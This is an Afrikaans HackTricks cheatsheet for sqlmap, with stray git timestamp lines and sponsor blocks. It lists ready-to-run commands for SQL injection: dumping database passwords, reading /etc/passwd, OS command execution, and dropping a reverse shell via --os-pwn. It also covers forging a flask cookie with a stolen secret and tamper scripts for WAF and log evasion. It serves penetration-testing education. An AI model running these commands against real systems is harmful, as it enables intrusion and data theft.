2024-08-04 15:19:32 +00:00
# SQLMap - Cheatsheet
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Leer & oefen GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
< summary > Ondersteun HackTricks< / summary >
2024-01-01 17:15:10 +00:00
2024-07-19 16:15:11 +00:00
* Kyk na die [**subskripsie planne** ](https://github.com/sponsors/carlospolop )!
* **Sluit aan by die** 💬 [**Discord groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram groep** ](https://t.me/peass ) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) en [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
2023-04-30 21:54:03 +00:00
< / details >
2024-07-19 16:15:11 +00:00
{% endhint %}
2022-04-28 16:01:33 +00:00
2024-08-04 15:19:32 +00:00
< figure > < img src = "/.gitbook/assets/pentest-tools.svg" alt = "" > < figcaption > < / figcaption > < / figure >
2022-04-28 16:01:33 +00:00
2024-09-08 10:51:50 +00:00
**Onmiddellik beskikbare opstelling vir kwesbaarheidsevaluering & penetrasietoetsing**. Voer 'n volledige pentest vanaf enige plek uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle weer 'n bietjie tyd te gee om dieper te delf, shells te pop en pret te hê.
2022-04-28 16:01:33 +00:00
2024-07-29 09:26:59 +00:00
{% embed url="https://pentest-tools.com/?utm_term=jul2024& utm_medium=link& utm_source=hacktricks& utm_campaign=spons" %}
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
## Basiese argumente vir SQLmap
2020-07-22 19:36:23 +00:00
2024-02-11 02:07:06 +00:00
### Generies
2020-07-22 19:36:23 +00:00
```bash
2024-02-11 02:07:06 +00:00
-u "< URL > "
-p "< PARAM TO TEST > "
--user-agent=SQLMAP
--random-agent
--threads=10
2020-07-22 19:36:23 +00:00
--risk=3 #MAX
--level=5 #MAX
2024-02-11 02:07:06 +00:00
--dbms="< KNOWN DB TECH > "
2020-07-22 19:36:23 +00:00
--os="< OS > "
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="< AUTH > " #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="< AUTH > " #HTTP authentication credentials (name:password)
2021-02-20 22:42:34 +00:00
--proxy=http://127.0.0.1:8080
2020-07-22 21:57:22 +00:00
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char
2020-07-22 19:36:23 +00:00
```
2024-09-08 10:51:50 +00:00
### Inligting Herwin
2020-07-22 19:36:23 +00:00
2024-07-19 16:15:11 +00:00
#### Internaal
2020-07-22 19:36:23 +00:00
```bash
--current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
2021-02-05 15:03:46 +00:00
--privileges #Get privileges
2020-07-22 19:36:23 +00:00
```
2024-02-11 02:07:06 +00:00
#### DB data
2020-07-22 19:36:23 +00:00
```bash
--all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D < DB NAME > )
--columns #Columns of a table ( -D < DB NAME > -T < TABLE NAME > )
-D < DB NAME > -T < TABLE NAME > -C < COLUMN NAME > #Dump column
```
2024-07-19 16:15:11 +00:00
## Inspuitplek
2020-07-22 19:36:23 +00:00
2024-07-19 16:15:11 +00:00
### Van Burp/ZAP vang
2020-07-22 19:36:23 +00:00
2024-07-19 16:15:11 +00:00
Vang die versoek en skep 'n req.txt lêer
2020-07-22 19:36:23 +00:00
```bash
sqlmap -r req.txt --current-user
```
2024-07-19 16:15:11 +00:00
### GET Versoek Inspuiting
2020-07-22 19:36:23 +00:00
```bash
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id
```
2024-07-19 16:15:11 +00:00
### POST Versoek Inspuiting
2020-07-22 19:36:23 +00:00
```bash
sqlmap -u "http://example.com" --data "username=*& password=*"
```
2024-08-04 15:19:32 +00:00
### Injekties in Headers en ander HTTP Metodes
2020-07-22 19:36:23 +00:00
```bash
#Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"
#Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"
#PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"
#The injection is located at the '*'
```
2024-05-05 22:31:04 +00:00
### Dui string aan wanneer inspuiting suksesvol is
2024-02-11 02:07:06 +00:00
```bash
--string="string_showed_when_TRUE"
```
### Eval
2021-06-25 15:27:40 +00:00
2024-09-08 10:51:50 +00:00
**Sqlmap** laat die gebruik van `-e` of `--eval` toe om elke payload te verwerk voordat dit met 'n python oneliner gestuur word. Dit maak dit baie maklik en vinnig om die payload op pasgemaakte maniere te verwerk voordat dit gestuur word. In die volgende voorbeeld is die **flask cookie sessie** **onderteken deur flask met die bekende geheim voordat dit gestuur word** :
2021-06-25 15:27:40 +00:00
```bash
sqlmap http://1.1.1.1/sqli --eval "from flask_unsign import session as s; session = s.sign({'uid': session}, secret='SecretExfilratedFromTheMachine')" --cookie="session=*" --dump
```
2024-07-19 16:15:11 +00:00
### Shell
2020-07-22 19:36:23 +00:00
```bash
#Exec command
python sqlmap.py -u "http://example.com/?id=1" -p id --os-cmd whoami
#Simple Shell
python sqlmap.py -u "http://example.com/?id=1" -p id --os-shell
#Dropping a reverse-shell / meterpreter
python sqlmap.py -u "http://example.com/?id=1" -p id --os-pwn
```
2024-02-11 02:07:06 +00:00
### Lees Lêer
2021-05-04 23:29:00 +00:00
```bash
--file-read=/etc/passwd
```
2024-07-19 16:15:11 +00:00
### Krap 'n webwerf met SQLmap en outomatiese eksploitasie
2020-07-22 19:36:23 +00:00
```bash
sqlmap -u "http://example.com/" --crawl=1 --random-agent --batch --forms --threads=5 --level=5 --risk=3
--batch = non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--crawl = how deep you want to crawl a site
--forms = Parse and test forms
```
2024-07-19 16:15:11 +00:00
### Tweede Orde Inspuiting
2021-05-04 23:29:00 +00:00
```bash
python sqlmap.py -r /tmp/r.txt --dbms MySQL --second-order "http://targetapp/wishlist" -v 3
sqlmap -r 1.txt -dbms MySQL -second-order "http://< IP / domain > /joomla/administrator/index.php" -D "joomla" -dbs
```
2024-07-19 16:15:11 +00:00
[**Lees hierdie pos** ](second-order-injection-sqlmap.md )**oor hoe om eenvoudige en komplekse tweede orde inspuitings met sqlmap uit te voer.**
2021-05-04 23:29:00 +00:00
2024-09-08 10:51:50 +00:00
## Pas Inspuiting aan
2020-07-22 19:36:23 +00:00
2024-07-19 16:15:11 +00:00
### Stel 'n agtervoegsel in
2020-07-22 19:36:23 +00:00
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --suffix="-- "
```
2024-02-11 02:07:06 +00:00
### Voorvoegsel
2020-07-22 19:36:23 +00:00
```bash
python sqlmap.py -u "http://example.com/?id=1" -p id --prefix="') "
```
2024-02-11 02:07:06 +00:00
### Help om booleaanse inspuiting te vind
2020-07-22 19:36:23 +00:00
```bash
# The --not-string "string" will help finding a string that does not appear in True responses (for finding boolean blind injection)
sqlmap -r r.txt -p id --not-string ridiculous --batch
```
2024-05-05 22:31:04 +00:00
### Tamper
2020-07-22 19:36:23 +00:00
2024-07-19 16:15:11 +00:00
Onthou dat **jy jou eie tamper in python kan skep** en dit is baie eenvoudig. Jy kan 'n tamper voorbeeld op die [Tweede Orde Injekie bladsy hier ](second-order-injection-sqlmap.md ) vind.
2020-07-22 19:36:23 +00:00
```bash
--tamper=name_of_the_tamper
#In kali you can see all the tampers in /usr/share/sqlmap/tamper
```
2024-07-19 16:15:11 +00:00
| Tamper | Description |
2021-10-18 11:21:18 +00:00
| ---------------------------- | ---------------------------------------------------------------------------------------------------------------------------------- |
2024-07-19 16:15:11 +00:00
| apostrophemask.py | Vervang apostrof karakter met sy UTF-8 volle breedte teenhanger |
| apostrophenullencode.py | Vervang apostrof karakter met sy onwettige dubbele unicode teenhanger |
| appendnullbyte.py | Voeg geënkodeerde NULL byte karakter by die einde van die payload aan |
2024-07-29 09:26:59 +00:00
| base64encode.py | Base64 al karakters in 'n gegewe payload |
2024-07-19 16:15:11 +00:00
| between.py | Vervang groter as operator ('>') met 'NOT BETWEEN 0 AND #' |
2024-09-08 10:51:50 +00:00
| bluecoat.py | Vervang spasie karakter na SQL verklaring met 'n geldige random leë karakter. Vervang daarna karakter = met LIKE operator |
| chardoubleencode.py | Dubbel url-encode al karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk) |
2024-07-19 16:15:11 +00:00
| commalesslimit.py | Vervang voorbeelde soos 'LIMIT M, N' met 'LIMIT N OFFSET M' |
| commalessmid.py | Vervang voorbeelde soos 'MID(A, B, C)' met 'MID(A FROM B FOR C)' |
2024-09-08 10:51:50 +00:00
| concat2concatws.py | Vervang voorbeelde soos 'CONCAT(A, B)' met 'CONCAT\_WS(MID(CHAR(0), 0, 0), A, B)' |
| charencode.py | Url-encode al karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk) |
| charunicodeencode.py | Unicode-url-encode nie-geënkodeerde karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk). "%u0022" |
| charunicodeescape.py | Unicode-url-encode nie-geënkodeerde karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk). "\u0022" |
| equaltolike.py | Vervang al voorkomste van operator gelyk ('=') met operator 'LIKE' |
| escapequotes.py | Slas escape aanhalings (' en ") |
| greatest.py | Vervang groter as operator ('>') met 'GREATEST' teenhanger |
| halfversionedmorekeywords.py | Voeg 'n geversioneerde MySQL kommentaar voor elke sleutelwoord by |
2024-07-19 16:15:11 +00:00
| ifnull2ifisnull.py | Vervang voorbeelde soos 'IFNULL(A, B)' met 'IF(ISNULL(A), B, A)' |
2024-09-08 10:51:50 +00:00
| modsecurityversioned.py | Omhels volledige navraag met geversioneerde kommentaar |
2024-07-29 09:26:59 +00:00
| modsecurityzeroversioned.py | Omhels volledige navraag met nul-geversioneerde kommentaar |
2024-09-08 10:51:50 +00:00
| multiplespaces.py | Voeg meerdere spasies rondom SQL sleutelwoorde by |
| nonrecursivereplacement.py | Vervang vooraf gedefinieerde SQL sleutelwoorde met verteenwoordigings geskik vir vervanging (bv. .replace("SELECT", "")) filters |
2024-07-19 16:15:11 +00:00
| percentage.py | Voeg 'n persentasieteken ('%') voor elke karakter by |
2024-09-08 10:51:50 +00:00
| overlongutf8.py | Converteer al karakters in 'n gegewe payload (nie reeds geënkodeerde verwerk) |
| randomcase.py | Vervang elke sleutelwoord karakter met random kaswaarde |
| randomcomments.py | Voeg random kommentaar by SQL sleutelwoorde |
| securesphere.py | Voeg spesiaal saamgestelde string by |
| sp\_password.py | Voeg 'sp\_password' by die einde van die payload vir outomatiese obfuskaasie van DBMS logs |
2024-07-19 16:15:11 +00:00
| space2comment.py | Vervang spasie karakter (' ') met kommentaar |
2024-09-08 10:51:50 +00:00
| space2dash.py | Vervang spasie karakter (' ') met 'n streep kommentaar ('--') gevolg deur 'n random string en 'n nuwe lyn ('\n') |
| space2hash.py | Vervang spasie karakter (' ') met 'n pond karakter ('#') gevolg deur 'n random string en 'n nuwe lyn ('\n') |
| space2morehash.py | Vervang spasie karakter (' ') met 'n pond karakter ('#') gevolg deur 'n random string en 'n nuwe lyn ('\n') |
| space2mssqlblank.py | Vervang spasie karakter (' ') met 'n random leë karakter uit 'n geldige stel alternatiewe karakters |
2024-07-19 16:15:11 +00:00
| space2mssqlhash.py | Vervang spasie karakter (' ') met 'n pond karakter ('#') gevolg deur 'n nuwe lyn ('\n') |
2024-09-08 10:51:50 +00:00
| space2mysqlblank.py | Vervang spasie karakter (' ') met 'n random leë karakter uit 'n geldige stel alternatiewe karakters |
| space2mysqldash.py | Vervang spasie karakter (' ') met 'n streep kommentaar ('--') gevolg deur 'n nuwe lyn ('\n') |
2024-07-19 16:15:11 +00:00
| space2plus.py | Vervang spasie karakter (' ') met plus ('+') |
2024-09-08 10:51:50 +00:00
| space2randomblank.py | Vervang spasie karakter (' ') met 'n random leë karakter uit 'n geldige stel alternatiewe karakters |
2024-07-19 16:15:11 +00:00
| symboliclogical.py | Vervang AND en OR logiese operators met hul simboliese teenhangers (& & en |
| unionalltounion.py | Vervang UNION ALL SELECT met UNION SELECT |
2024-09-08 10:51:50 +00:00
| unmagicquotes.py | Vervang aanhaling karakter (') met 'n multi-byte kombinasie %bf%27 saam met generiese kommentaar aan die einde (om dit te laat werk) |
| uppercase.py | Vervang elke sleutelwoord karakter met hoofletters waarde 'INSERT' |
| varnish.py | Voeg 'n HTTP kop 'X-originating-IP' by |
2024-07-29 09:26:59 +00:00
| versionedkeywords.py | Omhels elke nie-funksie sleutelwoord met geversioneerde MySQL kommentaar |
| versionedmorekeywords.py | Omhels elke sleutelwoord met geversioneerde MySQL kommentaar |
2024-09-08 10:51:50 +00:00
| xforwardedfor.py | Voeg 'n vals HTTP kop 'X-Forwarded-For' by |
2024-03-17 16:40:53 +00:00
2024-08-04 15:19:32 +00:00
< figure > < img src = "/.gitbook/assets/pentest-tools.svg" alt = "" > < figcaption > < / figcaption > < / figure >
2024-03-17 16:40:53 +00:00
2024-07-29 09:26:59 +00:00
**Dadelijk beskikbare opstelling vir kwesbaarheid assessering & pentesting**. Voer 'n volledige pentest van enige plek af uit met 20+ gereedskap & funksies wat van rekognisie tot verslagdoening gaan. Ons vervang nie pentesters nie - ons ontwikkel pasgemaakte gereedskap, opsporing & eksploitasiemodules om hulle terug 'n bietjie tyd te gee om dieper te delf, shells te pop, en pret te hê.
2022-04-28 16:01:33 +00:00
2024-07-29 09:26:59 +00:00
{% embed url="https://pentest-tools.com/?utm_term=jul2024& utm_medium=link& utm_source=hacktricks& utm_campaign=spons" %}
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Leer & oefen GCP Hacking: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Training GCP Red Team Expert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
< details >
2022-04-28 16:01:33 +00:00
2024-07-19 16:15:11 +00:00
< summary > Ondersteun HackTricks< / summary >
2024-01-01 17:15:10 +00:00
2024-07-19 16:15:11 +00:00
* Kyk na die [**subskripsie planne** ](https://github.com/sponsors/carlospolop )!
* **Sluit aan by die** 💬 [**Discord groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram groep** ](https://t.me/peass ) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) en [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-07-19 16:15:11 +00:00
{% endhint %}
